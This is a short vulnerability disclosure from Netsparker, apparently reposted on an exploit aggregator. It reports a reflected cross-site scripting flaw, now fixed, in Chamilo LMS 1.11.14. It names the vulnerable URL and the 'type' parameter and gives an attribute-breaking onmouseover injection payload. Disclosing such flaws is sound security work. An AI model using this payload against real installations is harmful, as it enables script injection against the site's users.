Share
## https://sploitus.com/exploit?id=PACKETSTORM:161178
Hello,  
  
We are informing you about a Cross-Site Scripting Vulnerability in Chamilo  
LMS 1.11.14.  
  
Information  
--------------------  
Advisory by Netsparker  
Name: Cross-Site Scripting Vulnerability in Chamilo LMS  
Affected Software: Chamilo LMS  
Affected Versions: 1.11.14  
Homepage: https://chamilo.org/en/  
Vulnerability: Cross-Site Scripting  
Severity: High  
Status: Fixed  
CVSS Score (3.0): 7.4 (High)  
Netsparker Advisory Reference: NS-21-001  
  
Technical Details  
--------------------  
  
URL: http://alihost/chamilo/main/calendar/agenda_list.php?type=x  
"%20onmouseover=netsparker(0x01CE61)%20x="#collapse-personal_1  
Parameter Name: type  
Parameter Type: GET  
Attack Pattern: x%22+onmouseover%3dnetsparker(0x01CE61)+x%3d%22  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/  
  
Regards,  
  
[image: upload image]  
Daniel Bishtawi | Marketing Administrator  
E: daniel.bishtawi@netsparker.com <daniel.bishtawi@netsparker.com>